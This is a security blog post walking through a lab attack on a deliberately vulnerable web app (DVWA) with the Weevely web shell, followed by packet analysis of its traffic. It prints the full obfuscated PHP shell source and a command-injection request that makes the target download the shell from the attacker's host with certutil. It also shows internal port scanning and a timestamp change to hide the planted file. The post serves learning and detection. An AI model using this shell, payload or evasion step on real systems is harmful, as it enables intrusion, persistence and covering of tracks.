Sunday, September 5, 2021

Continuing Web Shell - Weevely

In the previous post, I took the opportunity to get a better understanding of web shells. In this post, I'm leveraging a Weevely, which is part of Kali. There are a lots of other shells such as China Chopper, C99, etc. However, I choose Weevely just out of pure curiosity.

First generate the .php file named webshell.php and a password of "SecurityNik"

┌──(rootđź’€securitynik)-[~]
└─# weevely generate SecurityNik webshell.php
Generated 'webshell.php' with password 'SecurityNik' of 764 byte size.

With this generated, taking a look at the code 

┌──(rootđź’€securitynik)-[~]
└─# cat webshell.php 
<?php
$E=';for($i[%=0;$i<$[%l[%;){[%for($j=0;([%[%$j<$[%c&&$i<$l);$j++,$i+[%+){$[%o[%.=$t{';
$M='ean();$r=@base[%64[%[%_encode(@x(@gzco[%m[%press($o),$k[%));[%pri[%nt("$p$kh$r[%$kf");}';
$U='$k="[%e4f7[%fb[%5b";$kh="d597f2a[%3139[%[%9";$kf="499ce2[%29[%74f7";$p="Q[%Kdl0d[%L[%yL';
$p='[%et_[%con[%tents("[%php://inpu[%t"),$m)==1) {@ob_s[%tar[%t();@ev[%al(@gzu[%ncomp[%ress(';
$b='@x[%(@base6[%4_dec[%od[%e($[%m[1]),$k[%)));$o=[%@[%ob_get_contents()[%;[%@ob_end[%_[%cl';
$l='rgdCYf[%Q";fu[%nction x($[%t,[%$[%k){$c=strlen($k)[%;[%$l=st[%r[%len[%($t);$o=""';
$B=str_replace('C','','crCCeCaCtCe_fCunction');
$J='$[%i}^$k{$j};}[%}re[%turn[% $o;}i[%f (@preg_m[%atc[%h([%"/$k[%h(.+[%)$kf/[%",@file_g';
$u=str_replace('[%','',$U.$l.$E.$J.$p.$b.$M);
$q=$B('',$u);$q();
?>

Next, need to get the file to the system. Leveraging the command injection from before to upload the file.

Hosting a web server on my attacking machine

┌──(rootđź’€securitynik)-[~]
└─# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...

Executing curl command and reviewing the results ...

┌──(rootđź’€securitynik)-[~]
└─# curl --cookie "security=low; PHPSESSID=knc6aiujikoks8f5vqtuc98uc9" --data "ip=127.0.0.1+%26%26+certutil+-URLcache+-f+http%3A%2F%2F10.0.0.101:443%2Fwebshell.php+main.php+%26%26+dir+main.php&Submit=Submit" --request POST 'http://10.0.0.110/dvwa/vulnerabilities/exec/'


...
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
...
Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
...
CertUtil: -URLCache command completed successfully.
 Volume in drive C has no label.
 Volume Serial Number is 6C10-15EA

 Directory of C:\xampp\htdocs\DVWA\vulnerabilities\exec

09/04/2021  12:01 PM               764 main.php
               1 File(s)            764 bytes
               0 Dir(s)  20,947,238,912 bytes free

With te file uploaded, time to leverage Weevely.

┌──(rootđź’€securitynik)-[~]
└─# weevely http://10.0.0.110/dvwa/vulnerabilities/exec/main.php SecurityNik

[+] weevely 4.0.1

[+] Target:     10.0.0.110
[+] Session:    /home/securitynik/.weevely/sessions/10.0.0.110/main_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>

Now that the Weevely environment is available, time to leverage some of its features.

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :system_info 
+--------------------+---------------------------------------------------------------+
| document_root      | C:/xampp/htdocs                                               |
| whoami             |                                                               |
| hostname           | SECURITYNIK-WIN10                                             |
| pwd                | C:\xampp\htdocs\DVWA\vulnerabilities\exec                     |
| open_basedir       |                                                               |
| safe_mode          | False                                                         |
| script             | /dvwa/vulnerabilities/exec/main.php                           |
| script_folder      | C:\xampp\htdocs\DVWA\vulnerabilities\exec                     |
| uname              | Windows NT SECURITYNIK-WIN 10.0 build 18363 (Windows 10) i586 |
| os                 | Windows NT                                                    |
| client_ip          | 10.0.0.101                                                    |
| max_execution_time | 30                                                            |
| php_self           | /dvwa/vulnerabilities/exec/main.php                           |
| dir_sep            | \                                                             |
| php_version        | 7.2.1                                                         |
+--------------------+---------------------------------------------------------------+
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ 


SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::a049:348c:1e6b:6497%9
   IPv4 Address. . . . . . . . . . . : 10.0.0.110
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.109

Performing internal reconnaissance via a port scan on 4 different hosts, looking for a couple of common ports.

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :net_scan 10.0.0.1,10.0.0.2,10.0.0.101,10.0.0.110 22,80,443,445,8000,9997
Scanning addresses 10.0.0.1-10.0.0.110:22-8000
Scanning addresses 10.0.0.1-10.0.0.110:9997-9997
+------------------+
   |.0.0.101:22
 |10.0.0.101:8000
   |.0.0.110:80
  |0.0.0.110:443
  |0.0.0.110:445
 |10.0.0.101:9997

Changing the date and time on the "main.php" file to blend in with the index.php.

First get the dates and times for the files.

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir
...
02/05/2018  02:45 AM             1,830 index.php
09/04/2021  12:01 PM               764 main.php
...

Modifying and confirming the timestamp on the file

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :file_touch -human-ts "2018-02-05 01:45 AM" main.php
New timestamp: 2018-02-05 02:45:00

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir
...
02/05/2018  02:45 AM             1,830 index.php
02/05/2018  02:45 AM               764 main.php
...

I'm going to leave the rest of the commands at this time, as it seems most of them are for Linux based web servers. I can be wrong.

Looking at Weevley activity from the perspective of the packets. 

First up, what User-Agents did Weevley use?

┌──(rootđź’€securitynik)-[~]
└─# tshark -n -r weevley.pcap -T fields -e http.user_agent | sort | uniq 
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412

We could have also looked into our "access.log" file to get that answer.

Following the stream 0, looking at the payload we see ...

┌──(rootđź’€securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,0
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.101:40922
Node 1: 10.0.0.110:80
291
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close


83
A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi
        276
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 60
Connection: close
Content-Type: text/html; charset=UTF-8

QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7
===================================================================

While there is nothing that really stands out in the request, I have to ask what is "A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi" and "QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7" in the response? Those definitely do not look like normal responses to web requests.

Looking at other streams, I see something much similar to the first stream. Here is stream 3.

┌──(rootđź’€securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,3
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 3
Node 0: 10.0.0.101:40928
Node 1: 10.0.0.110:80
292
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close


227
A/'Sc(awS|cu$J^cd597f2a31399HahD+1tp91J1tIeIdFitWsxBzRfwWI1bcUBfpxxb2SOW9UPtnI042tsbWg88dJbZY6Kn8m4Bg2N2qAnAcFzaq/Y4KaleURDC4GTJOEFwPJB1vicFnfXs9POKT6RVeKg3/nozcjO69a67sl/2GY1e2iPGG0jnKOClsJoOCGf1GFA499ce22974f7nS.yn=#|-5>K)[Oi
        325
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8

QKdl0dLyLrgdCYfd597f2a31399Haht/i43HcxJGi/6Myp7rq7/SWYuqfkpNBxnPcEH02KAPjSkVbEHMTbAHo5mDlBtGA==499ce22974f7
===================================================================


What does the content in the response mean? Time for me to look at the video "Hunting and Dissecting the Weevely Web Shell - Threat Hunting Summit 2016" with Kiel Wadner.

Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)